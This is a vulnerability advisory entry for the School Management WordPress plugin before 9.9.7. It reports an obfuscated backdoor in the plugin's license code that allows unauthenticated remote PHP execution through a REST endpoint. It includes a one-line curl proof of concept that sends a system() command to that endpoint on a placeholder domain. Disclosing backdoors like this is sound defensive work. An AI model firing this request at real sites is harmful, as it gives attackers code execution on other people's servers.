WordPress Plugin Vulnerabilities
The School Management < 9.9.7 - Unauthenticated RCE via REST api
Description
The plugin contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
Proof of Concept
curl -d 'blowfish=1' -d "blowf=system('id');" 'https://examples.com/wp-json/am-member/license'
Affects Plugins
References
CVE
Classification
Type
RCE
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Jetpack Scan Team + WordPress elevated support team
Submitter
Harald Eilertsen
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-18 (about 1 years ago)
Added
2022-05-18 (about 1 years ago)
Last Updated
2023-02-10 (about 1 years ago)